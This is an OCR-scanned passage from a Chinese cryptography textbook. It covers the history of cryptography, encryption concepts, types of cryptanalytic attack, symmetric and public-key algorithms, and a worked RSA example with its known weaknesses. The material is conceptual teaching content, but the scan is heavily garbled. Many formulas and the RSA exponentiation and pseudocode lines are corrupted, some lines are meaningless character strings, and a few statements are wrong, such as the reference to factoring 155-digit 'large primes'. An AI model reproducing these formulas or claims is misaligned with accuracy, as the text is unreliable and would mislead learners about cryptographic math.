领域 ,没有 得 到 各 国 应 有 地 重视 。 随 着 战争 地 爆发 ,各 国 逐 渐 认 识 到 了 密码 在 战争 中 发 挥 的 
巨大 作用 ,积极 给 予 大 力 扶持 ,使 得 密码 科学 迅速 发 展 ,很 快 成 为 一 个 庞大 的 学 科 领 域 。 第 
二 次 世界 大 战 的 爆发 促进 了 密码 科学 的 飞速 发 展 , 德 国人 在 战争 期 间 共 生产 了 大 约 10 万 部 
“ENIGMA” 密 码 机 。 

现代 密码 学 涉及 数学 (如 数论 .有 限 域 .复杂 性 理论 ,组 合算 法 ,概率 算法 等 ) 物理 学 (如 
量子 力学 、 现 代 光 学 混沌 动力 学 等 )、 人 信息论, 计算 机 科学 等 学 科 。1949 年 ,信息 论 之 父 
C. E. Shannon 发 表 了 《保密 系统 的 通信 理论 ), 密 码 学 走 上 科学 和 理性 之 路 。1976 年 W. Diffie 
和 M. E. Hellman 发 表 的 《密码 学 的 新 方向 》, 以 及 1977 年 美国 公布 实施 的 数据 加 密 标准 
DES, 标 志 着 密码 学 发 展 的 革命 。2001 年 11 月 美国 国家 标准 技术 研究 所 发 布 高 级 数据 加 
密 标准 AES 等 。 

古典 密码 学 包含 两 个 互相 对 立 的 分 支 , 即 密码 编码 学 (Cryptography) 和 密码 分 析 学 
(Cryptanalytics) 。 前 者 编制 密码 以 保护 秘密 信息 ,而 后 者 则 研究 加 密 消息 的 破译 以 获取 信 
息 。 两 者 相辅相成 ,共处 于 密码 学 的 统一 体 中 。 现 代 密 码 学 除了 包括 密码 编码 学 和 密码 分 
析 学 外 ,还 包括 安全 管理 ,安全 协议 设计 、 散 列 函 数 等 内 容 。 如 密 钥 管 理 包括 密 钥 的 产生 分 
BO EE LIP .销毁 等 环节 ,密码 学 的 一 个 原则 是 算法 可 以 公开 ,秘密 寅 于 密 钥 之 中 ,所 以 密 
钥 管 理 在 密码 系统 中 至 关 重 要 。 密 码 学 的 进一步 发 展 ,涌现 了 大 量 的 新 技术 和 新 概念 ,如 零 
知识 证 明言 签名 .量子 密码 学 等 。 

消息 常 被 称 为 明文 。 用 某 种 方法 伪装 消息 以 隐藏 它 的 内 容 的 过 程 称 为 加 密 , 加 密 的 消 
息 称 为 密 文 ,而 把 密 文 转变 为 明文 的 过 程 称 为 解密 。 图 3. 1 表明 了 加 密 和 解密 过 程 。 


明文 密 文 原始 明文 
一 | 加密 一 | 解密 = 


图 3.1 加 密 和 解密 


明文 用 POO MOKRO RR. W CRR. MERKA E EHT PIE C, 
可 以 表示 为 : E(P) 二 C。 相 反 地 ,解密 函数 DD 作用 于 C 产 生 P, 可 以 表示 为 : DOSP, 

先 加 密 后 再 解密 消息 ,原始 的 明文 将 恢复 出 来 , 故 有 : D(E(P))=P。 

加 密 时 可 以 使 用 一 个 参数 K, 称 此 参数 K 为 加 密 密 钥 。K 可 以 是 很 多 数值 中 的 任意 
值 。 密 钥 K 的 可 能 值 的 范围 称 为 密 钥 空 间 。 如 果 加 密 和 解密 运算 都 使 用 这 个 密 钥 ( 即 运算 
都 依赖 于 密 钥 , 并 用 K 作为 下 标 表示 ) ,这样 , 加 /解密 函数 现在 变 成 : Ex CP) — C; 
Dk(O —P, 

这 些 函数 具有 的 特性 : Dk (Ex (P)) 二 P。 使 用 一 个 密 钥 的 加 /解密 如 图 3. 2 所 示 o 


[Es 


明文 


原始 明文 


-| 加 密 -| 解密 


图 3.2 使 用 一 个 密 钥 的 加 /解密 


有 些 算法 使 用 不 同 的 加 密 密 钥 和 解密 密 钥 ,如 图 3. 3 所 示 , 即 加 密 密 钥 KI 与 解密 密 钥 
K2 不同 ,在 这 种 情况 下 : Er (P)=C; Dxz (C)==P。 
即 De (Ea (P) —P 


明文 密 文 原始 明文 
-| 加 密 -| 解密 


图 3.3 使 用 两 个 密 钥 的 加 /解密 


一 个 密码 体制 是 满足 以 下 条 件 的 五 元 组 (P,C,K,E,D): 

。 了 表示 所 有 可 能 的 明文 组 成 的 有 限 集 (明文 空间 )， 

* C 表示 所 有 可 能 的 密 文 组 成 的 有 限 集 ( 密 文 空间 )， 

。 表示 所 有 可 能 的 密 钥 组 成 的 有 限 集 ( 密 钥 空 间 ); 

。 对 任意 的 k.K, 都 存在 一 个 加 密 算法 Ec E 和 相应 的 解密 算法 Di、D。 并 且 对 每 一 
个 Ek: PC 和 De: C、P, 对 任意 的 明文 x、.P, 均 有 Di (Er(x)) 二 x。 

对 密码 体系 的 评价 可 以 从 以 下 几 个 方面 来 看 。 

保密 强度 : 所 需要 的 安全 程度 与 数据 的 重要 性 有 关 。 保 密 强 度 大 的 系统 ,开销 往往 

较 大 。 

密 钥 的 长 度 : 密 钥 太 短 ,就 会 降低 保密 强度 ,然而 , 密 钥 太 长 又 不 便于 传送 、 保 管 和 

记忆 。 密 钥 必须 经 常 变换 ,每 次 更 换 新 密 钥 时 ,通信 双方 传送 新 密 钥 的 通道 必须 保 

密 和 安全 。 

。 算法 的 复杂 度 : 复杂 度 要 有 限度 ,否则 开销 太 大 。 

。 差错 的 传播 性 : 不 应 由 于 一 点 差错 致使 整个 通信 失败 。 

。 加 密 后 信息 长 度 的 增加 程度 : 信息 长 度 的 增加 将 导致 通信 效率 的 降低 。 

对 传输 中 的 数据 可 以 在 通信 的 不 同 层次 来 实现 , 即 链 路 加 密 与 端 到 端 加 密 , 如 图 3. 4 
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(1) 链 路 加 密 

链 路 加 密 是 对 两 个 节点 之 间 的 单独 通信 线路 上 数据 进行 加 密 保护 。 它 侧重 于 在 通信 和 链 
路 上 而 不 考虑 信 源 和 信 宿 。 链 路 加 密 是 面向 节点 的 ,对 于 网 络 高 层 主体 是 透明 的 , 它 对 高 层 
的 协议 信息 (地 址 , 检 错 、 帧 头 帧 尾 ) 都 加 密 , 因 此 数据 在 传输 中 是 密 文 的 。 

(2) 端 到 端 加 密 

端 到 端 加 密 为 网 络 提供 从 源 到 目的 的 传输 加 密 保护 。 端 到 端 加 密 则 指 信息 由 发 送 端 自 
动 加 密 , 并 进入 TCP/IP 数据 包 回 封 ,然后 作为 不 可 阅读 和 不 可 识别 的 数据 穿 过 互联 网 , 当 
这 些 信息 一 旦 到 达 目 的 地 ,将 自动 重组 ,解密 ,成 为 可 读数 据 。 


3.3 密码 攻击 


“ 攻 ” 与 “ 守 "” 是 密码 研究 的 两 个 主要 方面 。 经 受 不 住 攻击 的 密码 不 是 好 密码 ,不 会 攻击 
的 设计 者 也 设计 不 出 好 密码 。 了 解密 码 攻击 不 但 有 助 于 密码 设计 ,而 且 有 助 于 信息 系统 与 
密码 的 安全 保障 。“ 攻 "与 “ 守 ? 是 共生 的 ,又 是 互 着 的 ,两 者 密切 相关 但 追求 的 目标 相反 。 两 
者 解决 问题 的 途径 有 很 大 差别 。 

在 信息 的 传输 和 处 理 系 统 中 ,除了 合法 的 接收 者 外 ,还 有 “黑客 ”, 他 们 虽然 不 知道 系统 
所 用 的 密 钥 ,但 仍然 试图 努力 从 截获 的 密 文中 推断 出 原来 的 明文 ,这 一 过 程 称 为 密码 攻击 
(或 密码 分 析 )。 仅 对 截获 的 密 文 进行 分 析 而 不 对 系统 进行 任何 臭 改 ,此 种 攻击 称 为 被 动 攻 
击 。 密 码 系统 还 可 能 遭受 的 另 一 类 攻击 是 主动 攻击 。 此 时 ,“ 黑 客 " 主 动 干 扰 系 统 , 采 用 删 
除 \、 更 改 \ 增 添 、 重 放 、 伪 造 等 方法 向 系统 加 入 假 消息 。 被 动 攻 击 的 隐蔽 性 更 好 ,难以 发 现 , 主 
动 攻击 的 破坏 性 更 大 。 

密码 攻击 的 方法 有 穷 举 法 和 分 析 破 译 法 两 类 。 

1. 穷 举 法 

穷 举 法 又 称 为 强力 法 或 完全 试 次 法 , 它 对 截 收 的 密 报 依次 用 各 种 可 解 的 密 钥 试 译 ,直到 
得 到 有 意义 的 明文 ; 或 在 不 变 密 钥 下 ,对 所 有 可 能 的 明文 加 密 直 到 得 到 与 截获 密 报 一 致 为 
止 。 只 要 有 足够 多 的 计算 时 间 和 存储 容量 ,原则 上 穷 举 法 总 是 可 以 成 功 的 。 但 实际 中 ,任何 
一 种 能 保障 安全 要 求 的 实用 密码 都 会 设计 得 使 这 一 方法 在 实际 上 是 不 可 行 的 ,例如 ,破译 成 
本 太 高 (得 不 偿 失 ) 或 时 间 太 长 (超过 有 效 期 )。 为 了 减少 搜索 计算 量 , 可 以 采用 较 有 效 的 改 
进 试 次 法 。 它 将 密 钥 空 间 划分 成 几 个 (如 q 个 ) 可 能 的 子 集 , 对 密 钥 可 能 落 入 哪个 子 集 进行 
判断 ,至 多 需 进 行 q 次 试验 。 在 确定 了 正确 密 钥 所 在 的 子 集 后 ,就 对 该 子 集 再 进行 类 似 的 划 
分 并 检验 正确 密 钥 所 在 的 子 集 。 依 此 类 推 ,就 可 最 终 判 断 出 所 用 的 正确 密 钥 了 。 关 键 在 于 
如 何 实现 密 钥 空 间 的 等 概 子 集 的 划分 。 

2. 分 析 破 译 法 

分 析 破译 法 包括 确定 性 分 析 破 译 和 统计 分 析 破译 两 类 。 确 定性 分 析 法 利用 一 个 或 几 个 
已 知 量 ( 如 已 知 密 文 或 明文 一 密 文 对 ) 用 数学 关系 式 表 示 出 所 求 未 知 量 ( 如 密 钥 等 )。 已 知 量 
和 未 知 量 的 关系 视 加 密 和 解密 算法 而 定 ,寻求 这 种 关系 是 确定 性 分 析 法 的 关键 步 又。 统计 
分 析 法 利用 明文 的 已 知 统计 规律 进行 破译 的 方法 。 密 码 破 译 者 对 截 收 的 密 文 进行 统计 分 
析 , 总 结 出 其 间 的 统计 规律 ,并 与 明文 的 统计 规律 进行 对 照 比较 ,从 中 提取 出 明文 和 密 文 之 
间 的 对 应 或 变换 信息 。 密 码 分 析 之 所 以 可 能 成 功 ,最 根本 的 原因 是 明文 中 的 元 余 度 。 


破译 者 通常 是 在 下 述 3 种 条 件 下 工作 的 。 

CD) 惟 密 文 破译 。 此 时 ,破译 者 从 仅 知 道 的 截获 密 文 进行 分 析 , 得 出 明文 或 密 钥 。 

(2) 已 知 明文 破译 。 此 时 ,破译 者 不 但 能 够 截获 密 文 , 而 且 能 得 到 一 些 已 知 的 明文 一 密 
文 对 。 

(3) 选择 明文 破译 。 此 时 ,破译 者 可 以 用 他 所 选择 的 任何 明文 ,在 同一 未 知 密 钥 下 加 密 
得 到 相应 的 密 文 。 也 就 是 说 ,破译 者 可 以 选 定 任何 明文 一 密 文 对 来 进行 攻击 ,以 确定 未 知 的 
密 钥 。 

对 密码 破译 者 最 为 有 利 的 条 件 是 选择 明文 破译 。 因 此 ,好 的 密码 算法 必须 能 够 经 受 得 
住 选择 明文 攻击 。 

当然 ,密码 破译 的 成 功 除 了 利用 数学 演绎 和 归纳 法 之 外 ,还 要 利用 大 胆 的 猜测 和 对 一 些 
特殊 或 异常 情况 的 敏感 性 。 例 如 , 若 偶然 在 两 份 密 报 中 发 现 了 相同 的 码 字 或 片断 ,就 可 假定 
这 两 份 密 报 的 报头 明文 相同 。 又 如 ,在 栈 地 条 件 下 ,根据 栈 事 情况 可 以 猜测 当时 收 到 的 报 文 
中 某 些 密 文 的 含义 。 依 靠 这 种 所 谓 “ 可 能 字 法 ”, 常 常 可 以 幸运 地 破译 一 份 报 文 。 

一 个 密码 系统 是 否 被 “攻破 ”, 并 无 严格 的 标准 。 如 果 不 管 采用 什么 密 钥 ,敌手 都 能 从 密 
文 迅速 地 确定 出 明文 , 则 此 系统 当然 已 被 攻破 ,这 也 就 意味 着 敌手 能 迅速 确定 系统 所 用 的 密 
钥 。 如 果 对 大 部 分 密 钥 而 言 ,敌手 都 能 从 密 文 迅速 地 确定 出 明文 ,该 体制 也 可 说 已 被 攻破 。 
但 破译 者 有 时 也 可 能 满足 于 能 从 密 文 偶然 确定 出 一 小 部 分 明文 ,虽然 此 时 保密 系统 实际 上 
并 未 被 攻破 ,但 部 分 机 密 信息 已 被 泄露 。 

密码 史 表 明 ,密码 破译 者 的 成 就 似乎 远 比 密码 设计 者 的 成 就 更 令 人 赞叹 。 许 多 开始 时 
被 设计 者 吹 虚 为 “百年 或 千年 难 破 ”的 密码 , 没 过 多 久 就 被 密码 破译 者 巧妙 地 攻破 了 。 在 第 
二 次 世界 大 战 中 ,美军 破译 了 日 本 的 “ 紫 密 ”, 使 得 日 本 在 中 途 岛 战役 中 大 败 。 一 些 专家 们 估 
计 , 同 盟 军 在 密码 破译 上 的 成 功 至 少 使 第 二 次 世界 大 战 缩短 了 8 年 。 


3.4 密码 算法 及 其 分 类 


密码 算法 可 以 看 做 是 一 个 复杂 的 函数 变换 ,C = F (M, Key ),C 代表 密 文 , 即 加 密 后 
得 到 的 字符 序列 ,M 代表 明文 即 待 加 密 的 字符 序列 ,Key 表示 密 钥 ,是 秘密 选 定 的 一 个 字符 
序列 。 密 码 学 的 一 个 原则 是 “一 切 秘密 寓于 密 钥 之 中 ”, 算 法 可 以 公开 。 当 加 密 完 成 后 ,可 以 
将 密 文通 过 不 安全 渠道 送 给 收 信人 ,只 有 拥有 解密 密 钥 的 收 信人 可 以 对 密 文 进行 解密 即 反 
变换 得 到 明文 , 密 钥 的 传递 必须 通过 安全 渠道 。 

基于 密 钥 的 算法 通常 有 两 类 : 对 称 算法 和 公开 密 钥 算法 。 

1. 对 称 算法 

对 称 算法 就 是 加 密 密 钥 能 够 从 解密 密 钥 中 推算 出 来 , 反 过 来 也 成 立 。 在 大 多 数 对 称 算 
法 中 ,加 /解密 密 钥 是 相同 的 。 这 些 算 法 也 称 为 秘密 密 钥 算法 或 单 密 钥 算法 , 它 要 求 发 送 者 
和 接收 者 在 安全 通信 之 前 ,商定 一 个 密 钥 。 对 称 算法 的 安全 性 依赖 于 密 钥 ,泄漏 密 钥 就 意味 
着 任何 人 都 能 对 消息 进行 加 /解密 。 对 称 算法 可 分 为 两 类 。 序 列 密码 ( 流 密码 ) 与 分 组 密码 。 
序列 密码 一 直 是 作为 军 方 和 政府 使 用 的 主要 密码 技术 之 一 。 它 的 主要 原理 是 : 通过 伪 随 机 
序列 发 生 器 产生 性 能 优良 的 伪 随 机 序列 ,使 用 该 序列 加 密 信息 流 ,( 逐 比特 加 密 ) 得 到 密 文 序 
列 , 所 以 ,序列 密码 算法 的 安全 强度 完全 决定 于 伪 随 机 序列 的 好 坏 。 伪 随机 序列 发 生 器 是 指 
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输入 真 随机 的 较 短 的 密 钥 (种 子 ) 通 过 某 种 复杂 的 运算 产生 大 量 的 伪 随 机 位 流 。 序 列 密码 算 
法 将 明文 逐 位 转换 成 密 文 。 该 算法 最 简单 地 应 用 如 图 3. 5 所 示 , 密 钥 流 发 生 器 输出 一 系列 
比特 流 : Ki Ko Ka ern Ki 密 钥 流 跟 明文 比特 流 Pi ,P: ,P: ,… Pi ,进行 异 或 运算 产生 密 文 
比特 流 。 


Ci 一 也 [5] Ki 
在 解密 端 , 密 文 流 与 完全 相同 的 密 钥 流 异 或 运算 恢复 出 明文 流 。 
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图 3.5 序列 密码 算法 


对 于 一 个 序列 如 果 对 所 有 的 i 总 有 Kip 二 Ki, 则 序列 是 以 p 为 周期 的 ,满足 条 件 的 最 小 
的 Pp 称 为 序列 的 周期 。 密 钥 流 发 生 器 产生 的 序列 周期 应 该 足够 的 长 ,如 2”。 

基于 移 位 寄存 器 的 序列 密码 应 用 十 分 广泛 。 一 个 反馈 移 位 寄存 器 由 两 部 分 组 成 : 移 位 
寄存 器 和 反馈 函数 。 移 位 寄存 器 的 长 度 用 位 表示 ,如 果 是 n 位 长 , 称 为 n 位 移 位 寄存 器 。 移 
位 寄存 器 每 次 向 右 移动 一 位 ,新 的 最 左边 的 位 根据 反馈 函数 计算 得 到 , 移 位 寄存 器 输出 的 位 
是 最 低位 。 反 馈 移 位 寄存 器 如 图 3. 6 所 示 。 

最 简单 的 反馈 移 位 寄存 器 是 线性 反馈 移 位 寄存 器 ,反馈 函数 是 寄存 器 中 某 些 位 简单 异 
或 。4 位 线性 反馈 移 位 寄存 器 如 图 3. 7 所 示 。 
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产生 好 的 序列 密码 的 主要 途径 之 一 是 利用 移 位 寄存 器 产生 伪 随 机 序列 ,典型 方法 如 下 。 

CD 反馈 移 位 寄存 器 : 采用 非 线性 反馈 函数 产生 大 周期 的 非 线性 序列 。 

COD 利用 线性 移 位 寄存 器 序列 加 非 线 性 前 馈 函 数 ,产生 前 馈 序 列 。 

(3) 钟 控 序列 ,利用 一 个 寄存 器 序列 作为 时 钟 控 制 另 一 个 寄存 器 序列 (或 自己 控制 自 
己 ) 来 产生 钟 控 序列 ,这 种 序列 具有 大 的 线性 复杂 度 。 

分 组 密码 是 将 明文 分 成 固定 长 度 的 组 ( 块 ) ,如 64 比特 一 组 ,用 同一 密 钥 和 算法 对 每 一 
块 加 密 ,输出 也 是 固定 长 度 的 密 文 。 

著名 的 分 组 密码 包括 出 自 IBM 被 美国 政府 正式 采纳 的 数据 加 密 算 法 (Data Encryption 
Algorithm, DEA) ,由 中 国学 者 来 学 嘉和 著名 密码 学 家 James Massey 在 苏黎世 的 ETH F 
发 的 国际 数据 加 密 算 法 (International Data Encryption Algorithm. IDEA) 比利时 Joan 


Daemen 和 Vincent Rijmen 提交 ,被 美国 国家 标准 和 技术 研究 所 (US National Institute of 
Standards and Technology,NIST) 选 为 美国 高 级 加 密 标 准 (AES) 的 Rijndael, 

2. 公开 密 钥 算法 ( 非 对 称 算法 ) 

公开 密 钥 算法 中 用 作 加 密 的 密 钥 不 同 于 用 作 解 密 的 密 钥 ,而 且 解 密 密 钥 不 能 根据 加 密 
密 钥 计算 出 来 (至 少 在 合理 假定 的 长 时 间 内 ) ,所 以 加 密 密 钥 能 够 公开 ,每 个 人 都 能 用 加 密 密 
钥 加 密 信息 ,但 只 有 解密 密 钥 的 拥有 者 才能 解密 信息 。 在 公开 密 钥 算法 系统 中 ,加密 密 钥 称 
为 公开 密 钥 ( 简 称 公 钥 ) ,解密 密 钥 称 为 秘密 密 钥 ( 私 有 密 钥 ,简称 私 钥 ) 。 

公开 密 钥 算法 主要 用 于 加 密 / 解 密 数字 签名 、 密 钥 交 换 。 自 从 1976 年 公 钥 密码 的 思想 
提出 以 来 ,国际 上 已 经 出 现 了 许多 种 公 钥 密码 体制 ,比较 流行 的 有 基于 大 整数 因子 分 解 问题 
的 RSA 体制 和 Rabin 体制 .基于 有 限 域 上 的 离散 对 数 问题 的 DifferHellman 公 钥 体制 和 
ElGamal 体制 .基于 椭圆 曲线 上 的 离散 对 数 问题 的 Differ-Hellman 公 钥 体制 和 ElGamal ff 
制 。 这 些 密码 体制 有 的 只 适合 于 密 钥 交换 ,有 的 只 适合 于 加 /解密 。 

关于 对 称 密码 技术 和 非 对 称 密码 技术 的 讨论 表明 : 前 者 具有 加 密 速 度 快 .运行 时 占用 
资源 少 等 特点 ,后 者 可 以 用 于 密 钥 交 换 。 一 般 来 说 ,并 不 直接 使 用 非 对 称 加 密 算法 加 密 明 
文 , 而 仅 用 它 保护 实际 加 密 明 文 的 对 称 密 钥 , 即 所 谓 的 数字 信封 (Digital Envelope) 技术 。 
如 图 3. 8 所 示 的 信息 加 密 和 解密 ,A 向 B 发 送 保密 信息 。 


发 送 方 A | 接收 方 B 
| 
E2 


会 话 密 钥 | | 加 密 算法 Hp resms H aisem 
明文 一 El "Ez: 
- 加 密 : -| ms H 


图 3.8 信息 加 密 和 解密 


按照 加 密 时 对 明文 的 处 理 方式 ,密码 算法 又 可 分 为 分 组 密码 算法 和 序列 密码 算法 。 分 
组 密码 算法 是 把 密 文 分 成 等 长 的 组 分 别 加 密 ; 序列 密码 算法 是 一 个 比特 一 个 比特 地 处 理 ， 
用 已 知 的 密 钥 随机 序列 与 明文 按 位 异 或 。 


3.5 RSA 密码 算法 


1. RSA 算法 需要 以 下 相关 的 数学 概念 

d) 素数 : 素数 是 一 个 比 1 大 ,其 因子 只 有 1 和 它 本 身 ,没有 其 他 数 可 以 整除 它 的 数 。 
素数 是 无 限 的 。 例 如 ,2,3,5,7 等 。 

(2) 两 个 数 互 为 素数 : 是 指 它们 除了 1 之 外 没有 共同 的 因子 。 也 可 以 说 这 两 个 数 的 最 
大 公 因 子 是 1。 例 如 ,4 和 9,13 和 27 等 。 

G) 模 运 算 : 如 A 模 NN 运 算 , 它 给 出 了 A 的 余数 ,余数 是 从 0 到 N 一 1 的 某 个 整数 ,这 
种 运算 称 为 模 运算 。 

2. RSA 加 密 算 法 的 过 程 

(1) 取 两 个 随机 大 素数 p 和 q( 保 密 ) 。 


PKI ZR 


d ow 


网 经 安 会 与 信息 保障 


D 计算 公开 的 模 数 r 二 pq( 公 开 )。 

(3) 计算 秘密 的 欧 拉 函数 (r) — (p— D (GL— D (保密 ) ,两 个 素数 p 和 q 不 再 需要 ,应 该 
丢弃 ,不 要 让 任何 人 知道 。 

(4) 随机 选取 整数 e, 满 足 gcd(e,(r)) 二 1( 公 开 e, 加 密 密 钥 )。 

G) 计算 d, 满 足 de 二 1(mod GOD (保密 d, 解 密 密 钥 , 陷 门 信息 ) 。 

(6) 将 明文 x( 其 值 在 0 到 r 一 1 范围 内 ) 按 模 为 r AR e 次 寡 以 完成 加 密 操 作 ,从 而 产 
生 密 文 y( 其 值 也 在 0 到 r 一 1 范围 内 ) 。 

y = x'(mod r) 

(7) 将 密 文 y 按 模 为 r AR d KE é E RAE o 

x = y*(mod r) 

下 面 用 一 个 简单 的 例子 来 说 明 RSA 公开 密 钥 密码 算法 的 工作 原理 。 

取 两 个 素数 p= 二 11、q 二 13,p 和 qd 的 乘积 为 二 pXq 二 143, 算 出 秘密 的 欧 拉 函数 or) — 
(p— D X (gq 一 1) 二 120, 再 选取 一 个 与 g(r) 二 120 互 质 的 数 , 例 如 e 二 7, 作 为 公开 密 钥 ,e 的 
选择 不 要 求 是 素数 ,但 不 同 的 。 的 抗 攻 击 性 能 力 不 一 样 ,为 安全 起 见 要 求 选择 为 素数 。 对 于 
这 个 e 值 ,可 以 算出 另 一 个 值 d= 二 103,d EAA RH, WE eo d — 1 mod g(r), 其 实 7X 
103—721 除 以 120 确实 余 1。 欧 几 里 德 算法 可 以 迅速 地 找 出 给 定 的 两 个 整数 a A b 的 最 大 
公 因 数 gcd(a, b) ,并 可 判断 a 5 b 是否 互 素 ,因此 该 算法 可 用 来 寻找 解密 密 钥 。 

120—7X174-1 

1—120—7 X17 mod 120—120—7 X ( —120--17) mod 120—120-- 7X 103 mod 120 

(e) 这 组 数 公 开 ,(n,d) 这 组 数 保密 。 

设想 需要 发 送信 息 x 二 85。 利 用 (n,e) 二 (143,7) 计 算出 加 密 值 : 

y= x (mod r) = 85’ mod 143 = 123 

收 到 密 文 y—123 后 ,利用 O0 — (143.103) 3E EE C 

x = y* (mod r) = 123'"* mod 143 = 85 
加 密 信 息 x( 二 进 制 表示 ) 时 ,首先 把 x 分 成 等 长 数据 块 xm ,xz，…..，xi, 块 长 s, 其 中 
2*<n,s 尽 可 能 的 大 。 对 应 的 密 文 是 : 
yi = x(modr) 
解密 时 做 如 下 计算 : 
xi 一 ydCmodr) 

3. RSA 算法 中 的 难点 

CD 大 数 的 运算 

上 百 位 大 数 之 间 的 运算 是 实现 RSA 算法 的 基础 ,因此 程序 设计 语言 本 身 提供 的 加 减 乘 
除 及 取 模 算法 都 不 能 使 用 ,否则 会 产生 溢出 ,必须 重新 编制 算法 。 在 编程 中 要 注意 进位 和 借 
位 ,并 定义 几 百 位 的 大 数组 来 存放 产生 的 大 数 。 

(2) 素数 的 产生 

Hadamard 证 明 , 当 XX 变 得 很 大 时 ,从 2 到 XX 区 间 的 素数 数目 x(X) 与 X/lIn(X) 的 比值 
趋 近 于 1, 即 : 


lm aX) | 
x—> co X/In(X) ~ 


如 果 在 2 到 X 之 间 随 机 选取 一 个 整数 ,其 为 素数 的 概率 大 约 为 1/ln(X)。 对 于 1024 位 
的 模 数 r* 一 pq,p 和 q 将 选取 为 512 位 的 素数 。 一 个 随机 选取 的 512 位 整数 为 素数 的 概率 大 
Z9 1/1n2?7 221/355, 

目前 ,适用 于 RSA 算法 的 最 实用 的 素数 生成 办 法 是 概率 测试 法 。 该 法 的 思想 是 随机 产 
生 一 个 大 奇数 ,然后 测试 其 是 否 满足 一 定 的 条 件 ,如 满足 , 则 该 大 奇数 可 能 是 素数 ,否则 是 合 
数 , 经 过 充分 多 次 运行 该 算法 ,把 合 数 判断 为 素数 的 概率 可 以 降低 到 任何 所 期 望 的 值 以 下 ， 
如 solovay 和 strassen 的 简明 素性 概率 检测 法 。 目 前 也 存在 多 项 式 时 间 的 确定 性 算法 来 判 
断 一 个 数 是 否 为 素数 。 

(3) 高 次 索 剩 余 的 运算 

要 计算 x mod r, 因 为 x\e\r 都 是 大 数 而 不 能 采用 先 高 次 寡 再 求 剩 余 的 方法 来 处 理 ,而 
要 采用 平方 取 模 的 算法 , 即 每 一 次 平方 或 相 乘 后 ,立即 取 模 运算 。 设 e 可 表示 为 : 

e = b; 2,4 bia 2ra + eee + b; 2: + ee + bz 2: + bi 2 + bo 
那么 有 如 下 的 计算 x 算法 : 
Square-and-MultiplyCx.e.r) 

Z=1 
For i=k downto 0 

Do 

z-z*zmodr 

if bi=1 

thenz-z*x mod r 

Return(z) 


RSA 的 安全 性 在 理论 上 存在 一 个 空白 , 即 不 能 确切 知道 它 的 安全 性 能 如 何 。 能 做 出 的 
结论 是 : 对 RSA 的 攻击 困难 程度 不 比 大 数 分 解 更 难 , 因 为 一 旦 分 解 出 r 的 因子 pq, 就 可 以 
攻破 RSA 密码 体制 。 对 RSA 的 攻击 是 否 等 同 于 大 数 分 解 一 直 未 能 得 到 理论 上 的 证 明 , 因 
为 没 能 证 明 破解 RSA 就 一 定 需要 作 大 数 分 解 。 目 前 ,RSA 的 一 些 变种 算法 已 被 证 明 等 价 
于 大 数 分 解 。 不 管 怎样 ,分解 n 是 最 显然 的 攻击 方法 。1977 4E CREARE SE EA) Ze od el E 
求 分 解 一 个 129 位 十 进 数 (426 比特 ) ,直至 1994 年 3 月 才 由 Atkins 等 在 Internet. 上 动用 了 
1600 台 计 算 机 ,前 后 花费 了 8 个 月 的 时 间 才 找 出 答案 。 现 在 ,人 们 已 经 能 分 解 155 位 (十 进 
制 ) 的 大 素数 。 因 此 , 模 数 m 必须 选 大 一 些 , 因 具 体 适用 情况 而 定 。 

若 r 二 pq 被 因子 分 解 , 则 RSA 便 被 击破 。 

H paq BAW g(r) = 二 (p 一 1)(q 一 了 ) 便 可 算出 。 解 密 密 钥 d 关于 e 满 足 : 

de = 1(mod g(r) ) 

故 d 便 也 不 难 求 出 。 因 此 RSA 的 安全 依赖 于 因子 分 解 的 困难 性 。 目 前 因子 分 解数 最 
快 的 方法 ,其 时 间 复 杂 度 为 exp(sqrt(ln(n)lnln(n)))。 

RSA 实验 室 认 为 ,512 比特 的 r 已 不 够 安全 。 他 们 建议 ,现在 的 个 人 应 用 需要 用 768 HE 
特 的 r, 公 司 要 用 1024 比特 的 r, 极 其 重要 的 场合 应 该 用 2048 比特 的 ro 

总 而 言 之 , 随 着 硬件 资源 的 迅速 发 展 和 因数 分 解 算法 的 不 断 改进 ,为 保证 RSA 公开 密 
钥 密 码 体制 的 安全 性 ,最 实际 的 做 法 是 不 断 增 加 模 r 的 位 数 。 

为 了 安全 起 见 , 对 p、q 还 要 求 : pa 长 度 差异 不 大 ; p 一 1 和 q 一 1 有 大 素数 因子 ; 
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(p 一 1,q 一 1) 很 小 。 满 足 这 些 条 件 的 素数 称 为 安全 素数 。 

4. 其 他 的 安全 问题 

d) 公共 模 数 攻击 。 每 个 人 具有 相同 的 r, 但 有 不 同 的 指数 e 和 d, 这 是 不 安全 的 。 

D 低 加密 指 数 攻击 。 如 果 选 择 了 较 低 的 e 值 ,虽然 可 以 加 快 计 算 速 度 , 但 存在 不 安 

(3) 低 解 密 指数 攻击 。 如 果 选 择 了 较 低 的 d 值 , 这 是 不 安全 的 。 

(4) 选择 密 文 攻击 。 如 A 想 让 荆 对 一 个 不 愿意 签名 的 消息 m' 签 名 ,A 首先 选择 一 
个 任意 值 x, 计 算 y==x*(mod r) ,然后 要 求 工 对 m— ym 签名 ,A 最 后 计算 (ma mod x^! 
mod r —( ym)? x 'mod r= m'è mod r。 记 住 不 要 对 别人 提交 的 随机 消息 进行 签名 。 

5. RSA 的 缺点 

(1) 产生 密 钥 很 麻烦 ,受到 素数 产生 技术 的 限制 ,因而 难以 做 到 一 次 一 密 。 

(2) 分 组 长 度 太 大 ,为 保证 安全 性 ,n 至 少 也 要 600bits 以 上 ,使 运算 代价 很 高 ,尤其 是 
速度 较 慢 , 较 对 称 密码 算法 慢 几 个 数量 级 ; 且 随 着 大 数 分 解 技术 的 发 展 ,这 个 长 度 还 在 增 
加 ,不 利于 数据 格式 的 标准 化 。 目 前 ,SET(Secure Electronic Transaction. SET) 协 议 中 要 
求 CA 采用 2048 比特 长 的 密 钥 ,其 他 实体 使 用 1024 比特 长 的 密 钥 。 

(3) RSA 的 速度 由 于 进行 的 都 是 大 数 计算 ,使 得 RSA 最 快 的 情况 也 比 DES 慢 上 100 
倍 , 无 论 是 软件 还 是 硬件 实现 。 速 度 一 直 是 RSA 的 缺陷 。 一 般 来 说 只 用 于 少量 数据 加 密 。 
RSA 与 DES 的 优 、 缺 点 正好 互补 。RSA 的 密 钥 很 长 ,加 密 速 度 慢 ,而 采用 DES, 正 好 弥补 
f RSA 的 缺点 。 即 DES 用 于 明文 加 密 ,RSA 用 于 DES 密 钥 的 加 密 。 由 于 DES 加 密 速度 
快 ,适合 加 密 较 长 的 报 文 ; 而 RSA 可 解决 DES 密 钥 分 配 的 问题 。 美 国 的 保密 增强 邮件 
